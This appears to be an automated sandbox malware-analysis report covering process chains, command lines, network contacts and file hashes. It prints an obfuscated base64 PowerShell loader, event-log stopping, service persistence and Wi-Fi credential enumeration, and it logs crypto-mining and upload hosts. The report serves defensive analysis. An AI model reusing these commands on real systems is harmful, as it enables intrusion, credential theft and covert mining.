PID 2952 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe
PID 2044 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe
PID 2044 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\jafryz.exe
PID 3256 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\jafryz.exe C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe
PID 3256 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\jafryz.exe C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 3876 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 2588 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 2588 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 2588 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 2588 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4720 wrote to memory of 2588 N/A C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe C:\Windows\system32\conhost.exe
PID 4844 wrote to memory of 3708 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\svchost.com
PID 4844 wrote to memory of 3708 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\svchost.com
PID 4844 wrote to memory of 3708 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\svchost.com
PID 3708 wrote to memory of 1260 N/A C:\Windows\svchost.com C:\Windows\SysWOW64\cmd.exe
PID 3708 wrote to memory of 1260 N/A C:\Windows\svchost.com C:\Windows\SysWOW64\cmd.exe
PID 3708 wrote to memory of 1260 N/A C:\Windows\svchost.com C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1260 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1260 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2664 wrote to memory of 876 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost.com
PID 2664 wrote to memory of 876 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost.com
PID 2664 wrote to memory of 876 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\svchost.com
PID 876 wrote to memory of 1428 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\ffepoc.exe
PID 876 wrote to memory of 1428 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\ffepoc.exe
PID 876 wrote to memory of 1428 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\ffepoc.exe
PID 1428 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\ffepoc.exe C:\Windows\SysWOW64\cmd.exe
PID 1428 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\ffepoc.exe C:\Windows\SysWOW64\cmd.exe
PID 1428 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\ffepoc.exe C:\Windows\SysWOW64\cmd.exe
PID 432 wrote to memory of 2584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\ffepoc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\AdyenCC.exe

"C:\Users\Admin\AppData\Local\Temp\AdyenCC.exe"

C:\Windows\SysWOW64\wscript.exe

"wscript.exe" "C:\Users\Admin\start.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgImN2dHJlcy5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\cvtres.ps1' -Encoding UTF8"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\cvtres.ps1"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jafryz.exe"' & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jafryz.exe"'

C:\Users\Admin\AppData\Local\Temp\jafryz.exe

"C:\Users\Admin\AppData\Local\Temp\jafryz.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "PLYDNUAM"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "PLYDNUAM" binpath= "C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "PLYDNUAM"

C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe

C:\ProgramData\hqcbgqufmuqd\zkngqrmffoiw.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ffepoc.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ffepoc.exe"' & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ffepoc.exe"'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ffepoc.exe"

C:\Users\Admin\AppData\Local\Temp\ffepoc.exe

C:\Users\Admin\AppData\Local\Temp\ffepoc.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9505.tmp.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\tmp9505.tmp.bat

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\taskkill.exe

TaskKill /F /IM 1428

C:\Windows\SysWOW64\timeout.exe

Timeout /T 2 /Nobreak

Network

Country Destination Domain Proto
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
GB 51.195.211.231:1337 tcp
US 8.8.8.8:53 231.211.195.51.in-addr.arpa udp
GB 51.195.211.231:1337 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:2222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:1337 tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.184.241:80 icanhazip.com tcp
US 8.8.8.8:53 241.184.16.104.in-addr.arpa udp
US 104.16.184.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 104.16.184.241:80 icanhazip.com tcp
US 162.159.138.232:443 discord.com tcp
GB 51.195.211.231:80 51.195.211.231 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp
GB 51.195.211.231:80 51.195.211.231 tcp

Files

C:\Users\Admin\start.vbs

MD5 93d87c8509ed0e495a02d6b2cb4e0522
SHA1 9cbc105b345ccce63a8edb2b2f86932142735226
SHA256 b25a6eded1b6e392997b6cd72f20914456ec52ed3fed688d021c55e0e4090238
SHA512 97a33aa53ac17a6250b0bddb8f8027d2d2fe36b8e7bf843b3b9d6655b067b7e56e8c8d5218208f82f8b439f5af2cf6546ee753ea9eb267c21ff8e4c2d5d0eff8

C:\Users\Admin\temp.bat

MD5 9d5d6af2f6dd8e176f3c137d155a6523
SHA1 a7aff2aa02b6479f5430d3d71b7bd1e8171dc1ec
SHA256 8e5caf28acdfbe1a160b450ef1798778abb0a9b7952b03a2b0c7c11fd6fcadcd
SHA512 f8d6d39fdefe2ff6e3327d6e0f9a64afa6b14730e3b99b8b20d6157d64cb57b0bf889d62d91dbb30ce6f25194e9cbc259d225cd608a7fde42cdf51ac0148c7e7

memory/2684-6-0x00000000752EE000-0x00000000752EF000-memory.dmp

memory/2684-7-0x0000000003120000-0x0000000003156000-memory.dmp

memory/2684-8-0x00000000752E0000-0x0000000075A90000-memory.dmp

memory/2684-9-0x00000000057C0000-0x0000000005DE8000-memory.dmp

memory/2684-10-0x00000000752E0000-0x0000000075A90000-memory.dmp

memory/2684-11-0x0000000005730000-0x0000000005752000-memory.dmp

memory/2684-12-0x0000000005F20000-0x0000000005F86000-memory.dmp

memory/2684-13-0x0000000005F90000-0x0000000005FF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlmjwved.yle.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2684-23-0x0000000006000000-0x0000000006354000-memory.dmp

memory/2684-24-0x00000000064D0000-0x00000000064EE000-memory.dmp

memory/2684-25-0x0000000006500000-0x000000000654C000-memory.dmp

memory/2684-26-0x0000000007E20000-0x000000000849A000-memory.dmp

memory/2684-27-0x00000000075C0000-0x00000000075DA000-memory.dmp

memory/2684-31-0x00000000752E0000-0x0000000075A90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/2004-39-0x0000000005F70000-0x00000000062C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1b916e425b00002658bd002a8adc5ffe
SHA1 5518a288853674d6228611c73a1f6e5780a81422
SHA256 0d56e729415319fd5744b57124c7fd9b059a0fdb134c5063d12b785c0b3b0474
SHA512 272c164e95fee9bdaf401d8b59d0779ec9ccd92a552439bbe0baf33833aadf8f9e3c17024bfbc5f68235460274408dee13ca95e7204d5953bace443ea4fc1849

C:\Users\Admin\cvtres.ps1

MD5 cf3d71b1830bd5ebab91b74b125ed164
SHA1 e11f3439b92a2125761bfa1b45f63ae9a889e021
SHA256 36a0b822e329e362adec26ebcfc73c85ccab0f91cde3acc03ce217c41143eb8f
SHA512 822cb3a2a8be447d8aaadb13c27d15d1c35ad3184cb753f64f5ada7090637b9bd19480bba3aaca04d3de353158af7fe77046a35064b0cce2292bfcd0ddb0709c

memory/2004-45-0x0000000007690000-0x0000000007726000-memory.dmp

memory/2004-46-0x00000000075F0000-0x0000000007612000-memory.dmp

memory/2004-47-0x0000000007CE0000-0x0000000008284000-memory.dmp

memory/2004-49-0x00000000058B0000-0x00000000058FE000-memory.dmp

memory/2004-51-0x0000000005310000-0x000000000531A000-memory.dmp

memory/4844-52-0x0000000000400000-0x0000000000412000-memory.dmp

memory/4844-54-0x0000000005EE0000-0x0000000005F7C000-memory.dmp

memory/4844-55-0x0000000008400000-0x0000000008476000-memory.dmp

memory/4844-56-0x0000000008380000-0x00000000083E2000-memory.dmp

memory/4844-57-0x00000000084C0000-0x00000000084DE000-memory.dmp

memory/2044-68-0x0000000005F00000-0x0000000006254000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4c8282e4678aad8e6d41525ddada775e
SHA1 fce987532ff7423056f8e5ba20183b6260aeabb5
SHA256 e2bce975bea8781e327842e9f85cb91bae52df9d8450c4408957c6d8d3336444
SHA512 368904e7a19daf01b51f0f56c95ff4564a4593ca085ad7ee49dd7af694cc2ffa983be5d495e14e456daa402fe0803b8caf85686114cb688f209e45dd77a9e0a5

memory/2044-70-0x0000000006930000-0x000000000697C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jafryz.exe

MD5 775de32a8c3c7cc79b71add27bc316e6
SHA1 b47377c76d1e06c3f711a8c156300c2a9c86fd5c
SHA256 0e116a3f1c2a90a3e37663283426748a9095e58856bc3f9432718db71265f5bb
SHA512 287c21591a70466ee19ef8686fb8cac65b1f993d2e2e9ac59e28740be0aff0db20f20faae5a12070f0fc2a39118496a771531eee73095fbd0bcc1d10b07d3a3c

C:\Users\Admin\AppData\Local\Temp\3582-490\jafryz.exe

MD5 f3ef9f5e5c1d0ef850fa840fbef44aea
SHA1 49cfa77b79e92497962edc3456cda014e7e0531c
SHA256 7f98872e415358424986167baac5c0bf3e729207b6a3562187ee89892f5a7fbc
SHA512 c46a3760547f092da73505d698e19a11fc6bac0286ba5dacecf320f4aaef02ede044ca867d4f632a74703e280e99b1239ecf35e4ca29fa244c59c0d2b90ab895

C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe

MD5 8ffc3bdf4a1903d9e28b99d1643fc9c7
SHA1 919ba8594db0ae245a8abd80f9f3698826fc6fe5
SHA256 8268d3fefe8ca96a25a73690d14bacf644170ab5e9e70d2f8eeb350a4c83f9f6
SHA512 0b94ead97374d74eaee87e7614ddd3911d2cf66d4c49abbfd06b02c03e5dd56fd00993b4947e8a4bcd9d891fa39cab18cc6b61efc7d0812e91eb3aea9cd1a427

memory/3876-177-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3876-176-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3876-175-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3876-174-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3876-173-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3876-179-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2588-181-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-183-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-188-0x00000243F1C30000-0x00000243F1C50000-memory.dmp

memory/2588-186-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-191-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-190-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-193-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-192-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-189-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-187-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-185-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-184-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-182-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Windows\svchost.com

MD5 36fd5e09c417c767a952b4609d73a54b
SHA1 299399c5a2403080a5bf67fb46faec210025b36d
SHA256 980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2
SHA512 1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE

MD5 176436d406fd1aabebae353963b3ebcf
SHA1 9ffdfdb8cc832a0c6501c4c0e85b23a0f7eff57a
SHA256 2f947e3ca624ce7373080b4a3934e21644fb070a53feeaae442b15b849c2954f
SHA512 a2d1a714e0c1e5463260c64048ba8fd5064cfa06d4a43d02fc04a30748102ff5ba86d20a08e611e200dc778e2b7b3ae808da48132a05a61aa09ac424a182a06a

C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE

MD5 12c29dd57aa69f45ddd2e47620e0a8d9
SHA1 ba297aa3fe237ca916257bc46370b360a2db2223
SHA256 22a585c183e27b3c732028ff193733c2f9d03700a0e95e65c556b0592c43d880
